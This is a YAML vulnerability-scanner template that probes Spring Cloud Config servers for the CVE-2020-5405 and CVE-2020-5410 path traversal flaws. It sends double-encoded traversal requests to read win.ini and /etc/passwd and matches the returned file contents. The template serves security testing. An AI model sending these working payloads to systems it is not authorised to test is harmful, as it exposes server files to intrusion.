id: spring-cloud-lfi
info:
  name: Spring LFI 2020-5405, CVE-2020-5410
  risk: Critical
  confidence: Certain

params:
  - root: "{{.BaseURL}}"

replicate:
  prefixes: 'actuator, api, admin, eureka, api/v1'

variables:
  - endpoint: |
      %23/favicon.ico
      %23/static

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fc/Windows/win.ini{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "for 16-bit app support")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fc/Windows/win.ini{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "for 16-bit app support")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", ":/bin/bash")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd{{.endpoint}}
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", ":/bin/bash")

references:
  - link: https://github.com/spring-cloud/spring-cloud-config
  - link2: https://tanzu.vmware.com/security/cve-2020-5410